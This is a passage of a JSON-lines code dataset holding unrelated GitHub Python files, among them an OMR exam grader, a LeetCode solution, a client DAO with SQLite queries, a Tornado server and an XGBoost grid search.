PUT THEM IN A LIST\n myIndex=[]\n for x in range (0,questions):\n arr = myPixelVal[x]\n myIndexVal = np.where(arr == np.amax(arr))\n myIndex.append(myIndexVal[0][0])\n #print(\"USER ANSWERS\",myIndex)\n\n # COMPARE THE VALUES TO FIND THE CORRECT ANSWERS\n grading=[]\n for x in range(0,questions):\n if ans[x] == myIndex[x]:\n grading.append(1)\n else:grading.append(0)\n #print(\"GRADING\",grading)\n score = (sum(grading)/questions)*100 # FINAL GRADE\n #print(\"SCORE\",score)\n\n # DISPLAYING ANSWERS\n utlis.showAnswers(imgWarpColored,myIndex,grading,ans) # DRAW DETECTED ANSWERS\n utlis.drawGrid(imgWarpColored) # DRAW GRID\n imgRawDrawings = np.zeros_like(imgWarpColored) # NEW BLANK IMAGE WITH WARP IMAGE SIZE\n utlis.showAnswers(imgRawDrawings, myIndex, grading, ans) # DRAW ON NEW IMAGE\n invMatrix = cv2.getPerspectiveTransform(pts2, pts1) # INVERSE TRANSFORMATION MATRIX\n imgInvWarp = cv2.warpPerspective(imgRawDrawings, invMatrix, (widthImg, heightImg)) # INV IMAGE WARP\n\n # DISPLAY GRADE\n imgRawGrade = np.zeros_like(imgGradeDisplay,np.uint8) # NEW BLANK IMAGE WITH GRADE AREA SIZE\n cv2.putText(imgRawGrade,str(int(score))+\"%\",(70,100)\n ,cv2.FONT_HERSHEY_COMPLEX,3,(0,255,255),3) # ADD THE GRADE TO NEW IMAGE\n invMatrixG = cv2.getPerspectiveTransform(ptsG2, ptsG1) # INVERSE TRANSFORMATION MATRIX\n imgInvGradeDisplay = cv2.warpPerspective(imgRawGrade, invMatrixG, (widthImg, heightImg)) # INV IMAGE WARP\n\n # SHOW ANSWERS AND GRADE ON FINAL IMAGE\n imgFinal = cv2.addWeighted(imgFinal, 1, imgInvWarp, 1,0)\n imgFinal = cv2.addWeighted(imgFinal, 1, imgInvGradeDisplay, 1,0)\n\n # IMAGE ARRAY FOR DISPLAY\n imageArray = ([img,imgGray,imgCanny,imgContours],\n [imgBigContour,imgThresh,imgWarpColored,imgFinal])\n cv2.imshow(\"Final Result\", imgFinal)\n except:\n imageArray = ([img,imgGray,imgCanny,imgContours],\n [imgBlank, imgBlank, imgBlank, imgBlank])\n\n # LABELS FOR DISPLAY\n lables = [[\"Original\",\"Gray\",\"Edges\",\"Contours\"],\n [\"Biggest Contour\",\"Threshold\",\"Warpped\",\"Final\"]]\n\n stackedImage = utlis.stackImages(imageArray,0.5,lables)\n cv2.imshow(\"Result\",stackedImage)\n\n # SAVE IMAGE WHEN 's' key is pressed\n if cv2.waitKey(1) & 0xFF == ord('s'):\n cv2.imwrite(\"Scanned/myImage\"+str(count)+\".jpg\",imgFinal)\n cv2.rectangle(stackedImage, 
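# The grading above reduces to: threshold, split the warped sheet into a
# questions x choices grid, count lit pixels per cell, and take the brightest
# cell in each row as the marked answer. A tiny self-contained sketch of that
# reduction (illustrative only, not part of the original record):
import numpy as np

def pick_answers(pixel_counts):
    # pixel_counts: (questions, choices) array of cv2.countNonZero results;
    # the filled bubble is assumed to be the cell with the most lit pixels.
    return np.argmax(pixel_counts, axis=1)

# e.g. pick_answers(np.array([[900, 120, 100], [80, 950, 90]])) -> [0, 1]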
((int(stackedImage.shape[1] / 2) - 230), int(stackedImage.shape[0] / 2) + 50),\n (1100, 350), (0, 255, 0), cv2.FILLED)\n cv2.putText(stackedImage, \"Scan Saved\", (int(stackedImage.shape[1] / 2) - 200, int(stackedImage.shape[0] / 2)),\n cv2.FONT_HERSHEY_DUPLEX, 3, (0, 0, 255), 5, cv2.LINE_AA)\n cv2.imshow('Result', stackedImage)\n cv2.waitKey(300)\n count += 1","repo_name":"Fafa-DL/Opencv-project","sub_path":"CVZone/13 Optical Mark Recognition (OMR)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"48"} +{"seq_id":"42041513593","text":"def main():\n width = int(input(\"Please enter the width of the box: \"))\n height = int(input(\"Please enter the height of the box: \"))\n boxOutline = input(\"Please enter a symbol for the box outline: \")\n boxFill = input(\"Please enter a symbol of the box fill: \")\n topAndBot = []\n middle = []\n topRow = \"\"\n midRow = \"\"\n for w in range(width):\n topAndBot.append(boxOutline)\n if w == 0 or w == (width - 1):\n middle.append(boxOutline)\n else:\n middle.append(boxFill)\n for l in range(len(topAndBot)):\n topRow = topRow + topAndBot[l]\n for l in range(len(middle)):\n midRow = midRow + middle[l]\n for h in range(height):\n if h == 0 or h == (height - 1):\n print(topRow)\n else:\n print(midRow) \nmain()\n","repo_name":"MAPLE-Robot-Subgoaling/IPT","sub_path":"data/HW5/hw5_063.py","file_name":"hw5_063.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15564844192","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n \n# first = \"\"\n# second = \"\"\n \n# while l1:\n# first += str(l1.val)\n# l1 = l1.next\n \n# while l2:\n# second += str(l2.val)\n# l2 = l2.next\n \n first = \"\"\n second = \"\"\n \n while l1:\n first = str(l1.val) + first\n l1 = l1.next\n \n while l2:\n second = str(l2.val) + second\n l2 = l2.next\n \n total = str(int(first) + int(second))\n l = list(total)\n l.reverse()\n \n temp_node = ListNode(0)\n temp = temp_node\n \n while l:\n val = l.pop(0)\n new = ListNode(int(val))\n temp_node.next = new\n temp_node = temp_node.next\n \n return temp.next\n \n \n \n ","repo_name":"mweaser/leetcode_python","sub_path":"0002-add-two-numbers/0002-add-two-numbers.py","file_name":"0002-add-two-numbers.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70500917586","text":"import os\nimport pandas as pd\nfrom nilearn.image import math_img, load_img\nfrom joblib import Parallel, delayed\n\n\ndef cal_diff(sub,game1_cmap_temp,game2_cmap_temp):\n # calculate the neural difference between two games\n img1 = load_img(game1_cmap_temp.format(sub))\n img2 = load_img(game2_cmap_temp.format(sub))\n diff_img = math_img(\"img2-img1\", img1=img1, img2=img2)\n\n # save the difference image\n save_dir = r'/mnt/workdir/DCM/BIDS/derivatives/Nilearn/game2/value_diff/Setall/6fold/sub-{}/zmap'.format(sub) # look out\n os.makedirs(save_dir, exist_ok=True)\n diff_img.to_filename(os.path.join(save_dir, '{}_zmap.nii.gz'.format('value')))\n\n\n# subject\nparticipants_tsv = r'/mnt/workdir/DCM/BIDS/participants.tsv'\nparticipants_data = 
pd.read_csv(participants_tsv, sep='\\t')\ndata = participants_data.query(f'game2_fmri>=0.5') # look out\npid = data['Participant_ID'].to_list()\nsub_list = [p.split('-')[-1] for p in pid]\n\n\ngame1_cmap_temp = r'/mnt/data/DCM/result_backup/2023.5.14/Nilearn/game1/value_spct/Setall/6fold/sub-{}/zmap/value_zmap.nii.gz'\ngame2_cmap_temp = r'/mnt/data/DCM/result_backup/2023.5.14/Nilearn/game2/value_spct/Setall/6fold/sub-{}/zmap/value_zmap.nii.gz'\n\n# calculate the difference of image between game1 and game2 for each subject parallelly\nParallel(n_jobs=100)(delayed(cal_diff)(sub, game1_cmap_temp, game2_cmap_temp) for sub in sub_list)","repo_name":"YukunQu/DCM","sub_path":"analysis/mri/game2/game_diff.py","file_name":"game_diff.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9371700170","text":"import cv2\nimport numpy as np\nimport torch \nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom graphviz import Digraph\n\n\nclass MyUtils(object):\n \"\"\"docstring for MyUtils\"\"\"\n def __init__(self):\n super(MyUtils, self).__init__()\n\n \"\"\"\n input: gt: tensor\n output: gt: variable\n \"\"\"\n def tensor2Numpy(self, x, use_cuda=True):\n if use_cuda == True: \n x = x.cpu().data.numpy()\n else:\n x = x.data.numpy()\n x = x[0,:,:,:]\n x = x.transpose((1,2,0))\n return x\n\n def numpy2Tensor(self, x):\n x = x.transpose((2,0,1))\n x = x[np.newaxis, :]\n x = Variable(torch.from_numpy(x))\n return x\n\n # def processGtEccv(self, gt, lambda_=None, return_image=True):\n # gt = self.tensor2Numpy(gt)\n # if lambda_ is not None: lambda_ = self.tensor2Numpy(lambda_)\n \n # gradient = self.makeGradient(gt)\n\n # h,w,c = gt.shape\n\n # res = np.concatenate((gt, gradient, lambda_), axis=2)\n\n\n def save_snapshot(self, epoch, args, net, optimizer):\n torch.save({\n 'epoch': epoch,\n 'args' : args,\n 'state_dict': net.state_dict(),\n 'optimizer': optimizer.state_dict()\n }, 'snapshot{}/snapshot-{}.pth.tar'.format(args.gpu_num, epoch))\n\n\n def processGt(self, gt, scale_factor=1, gd=False, return_image=True):\n s = scale_factor\n gt = gt[0,:,:,:]\n gt = gt.transpose((1,2,0))\n # resize\n while s > 1:\n h,w,c = gt.shape\n gt = cv2.resize(gt, (h//2, w//2))\n s //= 2\n \n # make gradient\n if gd == True:\n gt = self.makeGradient(gt)\n\n if return_image == True: \n display = np.copy(gt)\n if gd == True: \n display += 0.5\n \n gt = gt.transpose((2,0,1))\n gt = gt[np.newaxis, :]\n gt = Variable(torch.from_numpy(gt))\n\n if return_image == True: return gt, display\n return gt\n\n def makeGradient(self, image):\n diff_x = np.diff(image, axis=1);\n diff_y = np.diff(image, axis=0);\n diff = np.zeros((image.shape[0],image.shape[1],image.shape[2]*2))\n diff[0:image.shape[0]-1,:,0:3] = diff_y\n diff[:,0:image.shape[1]-1,3:6] = diff_x\n return diff.astype(np.float32);\n\n def makeGradientTorch(self, image, direction='x', use_gpu=True):\n filters = torch.Tensor(torch.zeros(3,3,3,3))\n if use_gpu == True: filters = filters.cuda()\n for i in range(3):\n filters[i,i,1,1] = -1.\n if direction == 'x':\n for i in range(3):\n filters[i,i,1,2] = 1.\n else:\n for i in range(3):\n filters[i,i,2,1] = 1.\n filters = Variable(filters)\n return F.conv2d(image, filters, padding=1)\n\n def adjust_learning_rate(self, optimizer, args, epoch, beg, end, reset_lr=None):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n base_lr = args.base_lr\n for 
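# The schedule below is polynomial decay with a floor:
# lr = base_lr * ((end - epoch) / (end - beg)) ** power, clamped at 1e-8.
# Worked example, assuming base_lr=0.01 and power=0.9: halfway through
# (ratio 0.5) the rate is 0.01 * 0.5 ** 0.9 ~= 0.00536.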
param_group in optimizer.param_groups:\n if reset_lr is not None:\n param_group['lr'] = reset_lr\n continue\n param_group['lr'] = base_lr * (float(end-epoch)/(end-beg)) ** (args.power)\n if param_group['lr'] < 1.0e-8: param_group['lr'] = 1.0e-8\n\n def mse_loss_scalar(self, a, b, use_gpu=True):\n loss = torch.mean((a-b)**2)\n loss = loss.data.cpu().numpy()[0] if use_gpu else loss.data.numpy()[0]\n return loss\n\n def make_dot(self, var, params=None):\n \"\"\" Produces Graphviz representation of PyTorch autograd graph\n Blue nodes are the Variables that require grad, orange are Tensors\n saved for backward in torch.autograd.Function\n Args:\n var: output Variable\n params: dict of (name, Variable) to add names to node that\n require grad (TODO: make optional)\n \"\"\"\n if params is not None:\n assert isinstance(list(params.values())[0], Variable)\n param_map = {id(v): k for k, v in params.items()}\n\n node_attr = dict(style='filled',\n shape='box',\n align='left',\n fontsize='12',\n ranksep='0.1',\n height='0.2')\n dot = Digraph(node_attr=node_attr, graph_attr=dict(size=\"10240,10240\"), format='svg')\n seen = set()\n\n def size_to_str(size):\n return '('+(', ').join(['%d' % v for v in size])+')'\n\n def add_nodes(var):\n if var not in seen:\n if torch.is_tensor(var):\n dot.node(str(id(var)), size_to_str(var.size()), fillcolor='orange')\n elif hasattr(var, 'variable'):\n u = var.variable\n name = param_map[id(u)] if params is not None else ''\n node_name = '%s\\n %s' % (name, size_to_str(u.size()))\n dot.node(str(id(var)), node_name, fillcolor='lightblue')\n else:\n dot.node(str(id(var)), str(type(var).__name__))\n seen.add(var)\n if hasattr(var, 'next_functions'):\n for u in var.next_functions:\n if u[0] is not None:\n dot.edge(str(id(u[0])), str(id(var)))\n add_nodes(u[0])\n if hasattr(var, 'saved_tensors'):\n for t in var.saved_tensors:\n dot.edge(str(id(t)), str(id(var)))\n add_nodes(t)\n add_nodes(var.grad_fn)\n return dot\n# test\nif __name__ == '__main__':\n pass","repo_name":"albertxavier001/graduation-project","sub_path":"pytorch/myutils.py","file_name":"myutils.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"32265286946","text":"#Padrão DAO (Data Access Object);\n#Centraliza o acesso a dados dos objetos cliente.\nfrom model import database\nfrom model.clientes import Clientes\n\nlista_de_clientes = []\n#Adicionar um cliente.\ndef adicionar(novo_cliente):\n lista_de_clientes.append(novo_cliente)\n try:\n conn = database.connect()#Conecta\n cursor = conn.cursor()#Se move no banco\n sql = \"\"\"INSERT INTO Clientes (nome, email, telefone,excluir)\n VALUES (?,?,?,0);\"\"\"\n cursor.execute(sql, novo_cliente.getCliente())\n conn.commit()\n \n except Exception as e:\n print('Deu erro!')\n print(e)\n finally:\n conn.close()\n\n#Editar um cliente.\ndef editar(cliente):\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"\"\"UPDATE Clientes SET nome=?,email=?,telefone=? WHERE id = ?;\"\"\"\n l = cliente.getCliente()\n l.append(cliente.id)\n cursor.execute(sql,l)\n conn.commit()\n except Exception as e:\n print(e)\n finally:\n conn.close()\n\n\ndef update_excluir(id, excluir):\n # atualiza cliente\n\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"\"\"UPDATE Clientes SET excluir=? 
WHERE id=?;\"\"\"\n cursor.execute(sql, [excluir, id])\n conn.commit()\n except Exception as e:\n print(e)\n finally:\n conn.close()\n\n#Excluir um cliente.\ndef excluir(id_cliente):\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"\"\"DELETE FROM Clientes WHERE id = ?;\"\"\"\n cursor.execute(sql,[id_cliente])\n conn.commit()\n\n except Exception as e:\n print(e)\n finally:\n conn.close()\n \n#Lista todos os clientes.\n\n\nlista_clientes = []\nx = []\ndef listar_clientes():\n lista = []\n try:\n conn = database.connect()\n cursor = conn.cursor()\n sql = \"SELECT * FROM Clientes WHERE excluir = 0;\"\n cursor.execute(sql)\n linhas = cursor.fetchall()\n for cliente in linhas:\n #Pega as informações dos clientes.\n id = cliente[0]\n nome = cliente[1]\n email = cliente[2]\n telefone = cliente[3]\n excluir = cliente[4]\n \n\n novo_cliente = Clientes(id, nome, email, telefone,excluir)\n lista.append(novo_cliente)\n\n except Exception as e:\n print(e)\n finally:\n conn.close()\n return lista \n \n \n\n#Pegar um cliente específico.\n\n ","repo_name":"Michel3-01/Sistema_Loja_de_Roupas","sub_path":"model/clientes_dao.py","file_name":"clientes_dao.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21715857453","text":"import os\nfrom tornado.options import logging\n\nimport tornado.httpserver\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.web\nfrom handlers.echo_handler import EchoHandler\nfrom handlers.notes_api_handler import NoteAPIHandler, NotesAPIHandler\nfrom handlers.notes_websockets_handler import NoteWebSocketHandler\n\n__author__ = 'Tiago Pais'\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index.html\")\n\nclass IndexWebSocketsHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"index-ws.html\")\n\nsettings = {\n 'auto_reload': True,\n 'static_path': os.path.join(os.path.dirname(__file__), 'static'),\n}\n\napplication = tornado.web.Application([\n (r'/ws/echo', EchoHandler),\n (r'/ws/', IndexWebSocketsHandler),\n (r'/ws/note', NoteWebSocketHandler),\n\n (r'/api/note/(.+)', NoteAPIHandler),\n (r'/api/note/', NoteAPIHandler),\n (r'/api/note', NoteAPIHandler),\n (r'/api/notes', NotesAPIHandler),\n\n (r'/', IndexHandler)\n], **settings)\n\nif __name__ == \"__main__\":\n tornado.options.parse_command_line()\n\n logging.info(\"Starting Tornado web server on http://127.0.0.1:9090\")\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(port=9090, address=\"127.0.0.1\")\n tornado.ioloop.IOLoop.instance().start()","repo_name":"tiagopais/NotesAround-Server","sub_path":"notes_wstornadoserver.py","file_name":"notes_wstornadoserver.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"27335834962","text":"def troca(copos, f):\n if f == 1:\n x = copos[0]\n copos[0] = copos[1]\n copos[1] = x\n\n elif f == 2:\n x = copos[1]\n copos[1] = copos[2]\n copos[2] = x\n\n else:\n x = copos[2]\n copos[2] = copos[0]\n copos[0] = x\n\n return copos\n\npos = [\"A\", \"B\", \"C\"]\ncopos = [0]*3\nx = int(input())\ncopos[pos.index(str(input()))] = 1\n\nfor i in range(x):\n copos = troca(copos, int(input()))\n\nprint(pos[copos.index(1)])\n","repo_name":"piedro404/resolucoes-de-problemas","sub_path":"Uri/Jogo Dos Copos.py","file_name":"Jogo Dos 
Copos.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27395345835","text":"from pathlib import Path\nfrom typing import Union, List\nimport geopandas as gpd\nfrom geopandas import GeoDataFrame\nfrom shapely import Polygon\n\nfrom lidar_cmn.generic import check_path\n\n\ndef read_vector(\n data_path: Union[str, Path],\n layer_name: str = None,\n bbox: str = None,\n mask: str = None,\n rows: str = None,\n) -> GeoDataFrame:\n \"\"\"Read vector data and return a GeoDataFrame.\n\n Args:\n data_path: Union[str, Path]\n layer_name: str = None\n bbox: str = None\n mask: str = None\n rows: str = None\n \n Returns:\n GeoDataFrame\n \"\"\"\n # Read path\n path = check_path(path=data_path)\n\n # Read vector\n geodata = gpd.read_file(\n filename=path,\n engine=\"pyogrio\",\n fid_as_index=True,\n layer=layer_name,\n bbox=bbox,\n mask=mask,\n rows=rows\n )\n\n return geodata\n\n\ndef polygon_bbox(coordinates_list: List) -> Polygon:\n \"\"\"Make polygon bbox from list of coordinates.\n\n Args:\n coordinates_list: list\n\n Returns:\n Polygon\n \"\"\"\n if len(coordinates_list) == 4:\n return Polygon(\n [\n (coordinates_list[0], coordinates_list[3]),\n (coordinates_list[2], coordinates_list[3]),\n (coordinates_list[2], coordinates_list[1]),\n (coordinates_list[0], coordinates_list[1]),\n (coordinates_list[0], coordinates_list[3]),\n ]\n )\n else:\n raise Exception(f'The list must contain 4 objects. Your list has {len(coordinates_list)} objects.')\n\n\ndef target_area(\n boundaries: GeoDataFrame,\n link_source: GeoDataFrame,\n target: str = None\n) -> GeoDataFrame:\n \"\"\"Select target area data.\n\n Args:\n boundaries: GeoDataFrame\n link_source: GeoDataFrame\n target: str\n\n Returns:\n GeoDataFrame\n \"\"\"\n # Get target area\n if target is not None:\n focus_area = boundaries[boundaries[\"COMUNE\"] == target]\n else:\n focus_area = boundaries.dissolve()\n\n # Get bbox of target area\n bbox_coordinates = focus_area.geometry.bounds.iloc[0].tolist()\n\n # Make bbox\n bbox_shapely = polygon_bbox(coordinates_list=bbox_coordinates)\n bbox = gpd.GeoDataFrame(geometry=gpd.GeoSeries(bbox_shapely), crs=boundaries.crs)\n\n # Select target area data\n select_data = gpd.overlay(\n df1=bbox,\n df2=link_source,\n how=\"intersection\"\n )\n\n return select_data\n\n\n","repo_name":"MaxDragonheart/lidar_cmn","sub_path":"lidar_cmn/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71664877587","text":"from sethelper import *\nfrom itertools import permutations, product\nimport math\n\nfolder = 's3wreathc2'\n\nsep = 400 # between centers of triangles\nt_rad = 160 # radius of each triangle\nwidth = 10 # dot outlines\ndot_rad = 70\nspinner_width = 15\n\ndot_colors = [[(255,0,0), (245,245,0), (0,144,255)], [(240,150,0), (0,180,0), (150,0,255)]]\nspinner_colors = [(0,0,0), (150,150,150)]\n\npolar = lambda p,r,t: (p[0]+math.cos(t/180*math.pi)*r, p[1]+math.sin(t/180*math.pi)*r)\nbounding_box = lambda p,r: [p[0]-r, p[1]-r, p[0]+r, p[1]+r]\n\n\ndef spinner(draw, p, r, theta, sign, width, color):\n\tfor i in range(3):\n\t\tt = theta+120*i\n\t\t# draw.ellipse(bounding_box(p,20), (0,0,255))\n\t\tdraw.arc(bounding_box(polar(p,r/2,t), r/2+width/2), *[t,t-180][::(-1)**sign], color, width)\n\n\nfor orders in product(permutations(range(3)), repeat=2): # orders[i] is the permutation of the ith 
triangle\n\tfor swap in range(2): # says whether triangles are swapped\n\t\timg, draw = blankcard()\n\t\tdraw_orienter(draw)\n\n\t\tfor t in range(2): # position we're drawing a triangle\n\t\t\tT = t^swap # which triangle we're drawing\n\t\t\tp = (cardwidth/2, cardheight/2+sep/2*(-1)**t) # center of triangle\n\n\t\t\t# draw spinner\n\t\t\tsign = sum(orders[T][i]>orders[T][j] for i in range(3) for j in range(i,3))%2\n\t\t\tspinner(draw, p, t_rad, 90+60*t+(-1)**sign*25, sign, spinner_width, spinner_colors[T])\n\n\t\t\t# draw dots\n\t\t\tfor i in range(3):\n\t\t\t\tdraw.ellipse(bounding_box(polar(p, t_rad, 90+60*t+120*i), dot_rad), dot_colors[T][orders[T][i]], (spinner_colors[T]), width)\n\n\n\n\n\t\timg.save(f'{folder}/fronts/{orders}{swap}.png')\n\nsetback('S3CT', (209,152,249)).save(f'{folder}/back.png')","repo_name":"redstonerodent/set-variants","sub_path":"s3wreathc2.py","file_name":"s3wreathc2.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"40465951002","text":"\"\"\"Add test related fixtures here e.g. a fixture that will pre-create a resource needed for the tests.\"\"\"\nimport asyncio\nimport pathlib\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\n\nimport dict_tools\nimport pop\nimport pytest\nimport pytest_asyncio\n\n\n@pytest.fixture(scope=\"session\")\ndef code_dir() -> pathlib.Path:\n print(f\"code_dir:{pathlib.Path(__file__).parent.parent.absolute()}\")\n return pathlib.Path(__file__).parent.parent.absolute()\n\n\n@pytest.fixture(scope=\"module\")\ndef acct_data(ctx):\n \"\"\"\n acct_data that can be used in running simple yaml blocks\n \"\"\"\n yield {\"profiles\": {\"oci\": {\"default\": ctx.acct}}}\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef acct_profile() -> str:\n return \"TODO: Add profile name to use for test\"\n\n\n@pytest.fixture(scope=\"module\")\ndef event_loop():\n loop = asyncio.get_event_loop()\n yield loop\n loop.close()\n\n\n@pytest.fixture(scope=\"session\")\ndef acct_subs():\n return [\"oci\"]\n\n\n@pytest.fixture(scope=\"module\", name=\"hub\")\ndef integration_hub(code_dir, event_loop):\n hub = pop.hub.Hub()\n hub.pop.loop.CURRENT_LOOP = event_loop\n hub.pop.sub.add(dyne_name=\"idem\")\n hub.pop.config.load(hub.idem.CONFIG_LOAD, \"idem\", parse_cli=False)\n hub.idem.RUNS = {\"test\": {}}\n\n yield hub\n\n\n@pytest_asyncio.fixture(scope=\"module\", name=\"ctx\")\nasync def integration_ctx(\n hub, acct_subs: List[str], acct_profile: str\n) -> Dict[str, Any]:\n ctx = dict_tools.data.NamespaceDict(\n run_name=\"test\",\n test=False,\n tag=\"fake_|-test_|-tag\",\n old_state={},\n )\n\n if not hub.OPT.acct.acct_file:\n raise ConnectionError(\"No ACCT_FILE in the environment\")\n if not hub.OPT.acct.acct_key:\n raise ConnectionError(\"No ACCT_KEY in the environment\")\n\n await hub.acct.init.unlock(hub.OPT.acct.acct_file, hub.OPT.acct.acct_key)\n ctx.acct = await hub.acct.init.gather(acct_subs, acct_profile)\n if not ctx.acct:\n raise Exception(\n f'Unable to load acct \"{acct_profile}\" from \"{hub.OPT.acct.acct_file}\"'\n )\n\n yield ctx\n\n\n@pytest.fixture(\n scope=\"function\",\n name=\"__test\",\n params=[0, 1, 2, 3],\n ids=[\"--test\", \"run\", \"no change --test\", \"no change\"],\n)\ndef test_flag(ctx, request):\n \"\"\"\n Functions that use the __test fixture will be run four times\n 0. With the --test flag set, to test what happens before creating a resource\n 1. 
Without the --test flag set, to create a resource\n 2. With the --test flag set, to verify that no changes would be made\n 3. Without the --test flag set, to verify that no changes are made\n \"\"\"\n ctx.test = bool((request.param + 1) % 2)\n yield request.param\n","repo_name":"35thelement/bromine-oci-idem","sub_path":"tests/integration/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38122398650","text":"#BST\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\ndef lowestCommonAncestor(root, p, q):\n while root:\n # If both p and q are greater than parent\n if root.val < p.val and root.val < q.val:\n root = root.right\n # If both p and q are lesser than parent\n elif root.val > p.val and root.val > q.val:\n root = root.left\n else:\n return root.val\n return None\n#time O(h)\n#space O(1)\n","repo_name":"0xspringtime/leetcode","sub_path":"0235n.py","file_name":"0235n.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"556454561","text":"import argumentos\nimport numpy as np\nimport salvar_resultados\nfrom data_stream_generators import get_dataset\n\nfrom adaptive_xgboost import AdaptiveXGBoostClassifier\nfrom adaptive_semiV2 import AdaptiveSemi\nfrom modelos_adaptados_para_sklearn import (\n AdaptiveRandomForestClassifierA,\n HoeffdingAdaptiveTreeClassifierA,\n AdaptiveSemiRegressorJr2,\n AdaptiveSemiRegressorJ2\n)\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.metrics import make_scorer, mean_squared_error, r2_score\n#define your own mse and set greater_is_better=False\nmse = make_scorer(mean_squared_error,greater_is_better=False)\n\ndef MSE(y_true,y_pred):\n mse = mean_squared_error(y_true, y_pred)\n print ('MSE: %2.3f' % mse)\n return mse\n\ndef R2(y_true,y_pred): \n r2 = r2_score(y_true, y_pred)\n print ('R2: %2.3f' % r2)\n return r2\n\ndef two_score(y_true,y_pred): \n MSE(y_true,y_pred) #set score here and not below if using MSE in GridCV\n score = R2(y_true,y_pred)\n return score\n\ndef two_scorer():\n return make_scorer(two_score, greater_is_better=False) # change for false if using MSE\n\n\ndef _criar_modelo(**kwargs):\n if argumentos.CLASSIFICADOR == \"axgb\":\n return AdaptiveXGBoostClassifier(**kwargs)\n elif argumentos.CLASSIFICADOR == \"axgb_reset\":\n return AdaptiveSemiRegressorJr2(detect_drift=True, unic=\"N\", **kwargs)\n elif argumentos.CLASSIFICADOR == \"axgb_sem_reset\":\n return AdaptiveSemiRegressorJ2(detect_drift=True, unic=\"N\", **kwargs)\n\n\nparameter_grid = {}\nparameter_grid = {\n \"max_depth\": [1, 5, 10, 15],\n \"learning_rate\": [0.01, 0.05, 0.1, 0.5],\n \"max_window_size\": [512, 1024, 2048, 4096, 8192],\n \"min_window_size\": [4, 8, 16],\n}\n\nparameter_grid_drifts = {\n \"adwin_delta\": [1, 0.002, 0.003, 0.00001, 0.0001],\n \"kswin_alpha\": [1, 0.005, 0.003, 0.00001, 0.0001],\n \"kswin_window_size\": [100, 500],\n \"kswin_stat_size\": [30, 100],\n \"ddm_min_num_instances\": [30, 50],\n \"ddm_warning_level\": [1, 2],\n \"ddm_out_control_level\": [3, 5]\n}\n\nprint(f\"Carregando dataset {argumentos.DATASET}\")\ndataset = np.loadtxt(f\"datasets/{argumentos.DATASET}.csv\", delimiter=\",\", skiprows=1)\nprint(f\"Configurando dataset\")\n\nprint(dataset)\nX, y = (\n dataset[: argumentos.MAX_REGISTROS, 
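# Note on the scorers defined in this record: make_scorer(...,
# greater_is_better=False) negates the metric so GridSearchCV can still
# maximize, which is why best_score_ comes back negative for MSE -- an MSE
# of 4.0 is reported as -4.0. Minimal sketch:
#
#   from sklearn.metrics import make_scorer, mean_squared_error
#   mse_scorer = make_scorer(mean_squared_error, greater_is_better=False)
#   # mse_scorer(fitted_model, X, y) == -mean_squared_error(y, fitted_model.predict(X))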
:-1],\n dataset[: argumentos.MAX_REGISTROS, -1],\n)\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, train_size=0.3, random_state=1\n)\n\nprint(X_train, X_test,y_train, y_test)\ngs_cv = GridSearchCV(_criar_modelo(), parameter_grid_drifts, scoring=two_scorer(), n_jobs=2)\n\nprint(f\"Realizando GridSearchCV\")\nresult = gs_cv.fit(X_train, y_train)\n\n# summarize result\nprint('Best Score: %s' % result.best_score_)\nprint('Best Hyperparameters: %s' % result.best_params_)\n\nprint(\"Salvando resultados\")\nsalvar_resultados.salvar_resultados_gridsearch(gs_cv.cv_results_, gs_cv.best_params_)\n","repo_name":"fernandamsouza/Adaptive-Fast-XGBoost-for-Regression","sub_path":"GridSearch/tcc-validacao/grid_cv.py","file_name":"grid_cv.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 